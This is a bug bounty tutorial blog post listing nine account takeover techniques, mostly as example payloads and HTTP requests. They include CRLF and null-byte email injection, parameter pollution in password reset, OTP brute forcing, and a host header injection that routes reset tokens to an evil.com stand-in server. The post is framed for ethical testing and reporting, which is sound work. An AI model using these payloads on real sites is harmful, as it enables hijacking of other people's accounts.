asd
HomeTips and TricksBug Bounty: Trick to Find Account Takeover and GET BOUNTY

Bug Bounty: Trick to Find Account Takeover and GET BOUNTY

Tips Account Takeover: Welcome to our in-depth guide on mastering the art of bug bounty hunting, focusing specifically on account takeover techniques. In today’s ever-evolving cybersecurity landscape, staying a step ahead of potential vulnerabilities is absolutely crucial. In this article, we’re going to dive deep into a variety of technique that revolve around exploiting account takeover vulnerabilities, with a special emphasis on the concept of “Email Replacing” during the account registration process.

We’ll also explore techniques like “Parameter Pollution” in reset password functionalities, “OTP Code Bruteforce,” “Host Header Injection,” and even the clever use of separators within parameter values, among other tactics.

Throughout this guide, we’ll provide you with real-world examples and break down the mechanics behind each technique. Our goal is to arm you with the knowledge and insights necessary to not only identify and understand these vulnerabilities, but also to ethically report them and contribute to a safer digital ecosystem.

So, whether you’re someone looking to explore the exciting world of ethical hacking or a dedicated security enthusiast, keep reading to elevate your bug bounty skills and play a vital role in ensuring online security.

 

1. Account Takeover Through Email Replacing when Registering Account (testing/abuse email filter)

Example:

[email protected],[email protected]
email@email“,”[email protected]
[email protected]:[email protected]
[email protected]%0d%0a[email protected]
%0d%0a[email protected]
%0a[email protected]
[email protected]%0d%0a
[email protected]%0a
[email protected]%0d
[email protected]%00
[email protected]{{}}

Example Request:

name=HACKER&email=[email protected]&email=[email protected]&username=hackerz&password=THIS_ISPASSWORD_TO_TAKEOVER&password-confirmation=THIS_ISPASSWORD_TO_TAKEOVER&_csrf_token=XXX7139a5209c08aec2dbff06f5ab5XXXXXXXXXX

2. Account Takeover Through Parameter Pollution in Reset Password

Example:

POST /passwordReset
[…]
[email protected]&[email protected]

or in JSON:

{“email”:[“[email protected]”,”[email protected]”]}

 

3. Account Takeover Through OTP Code Bruteforce

Example:

POST /reset
[…]
[email protected]&code=$12345$

You can use Burp Intruder.

 

4. Account Takeover Through Host Header Injection

Example:

POST /reset
Host: evilsite.com
[…]
[email protected]

POST /reset
Host: target.com
X-Forwarded-Host: evil.com
[…]
[email protected]

And the victim will receive the reset link email with with “token” will contail “evilsite.com“, so when the user click the link, the “token” will logged/extracted to the evilsite.com server log.

 

5. Account Takeover Through Using Separator in Value of the Parameter

Example:

POST /PWreset
[…]
[email protected],[email protected]

POST /PWreset
[…]
[email protected]%20[email protected]

POST /PWreset
[…]
[email protected]|[email protected]

POST /PWreset
[…]
[email protected]%00[email protected]

 

6. Try input No Domain in Value of the Parameter to Account Takeover

Example:

Example:

POST /registeraccount
[…]
email=victimemail

 

7. Try input No TLD in Email Value of the Parameter

Example:

POST /reset
[…]
[email protected]

POST /reset
[…]
[email protected]%0a%0dcc:[email protected]

 

8. Try Re-Sign up using Same Email

Example:

POST /newaccount
[…]
[email protected]&password=1234

After sign up using victim email, try signup again but using different password

POST /newaccount
[…]
[email protected]&password=yourehacked

 

9. If there is JSON data in requests, add comma and input your hacker email

Example:

POST /newaccount
[…]
{“email”:“[email protected]”,”[email protected]”,“token”:”xxxxxxxxxx”}

 

CLOSING

We acquired this account takeover trick from various sources, with one of them being daffainfo. Among these multiple tricks, there are a few that I have personally attempted and successfully executed. I’m optimistic that you’ll achieve success with them as well, someday. Pinterest : account takeover tips

-SECRY

Christin
Christinhttps://secry.me/explore
A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

5 × three =

Most Popular

GOOGLE ADVERTISEMENT

- Advertisement -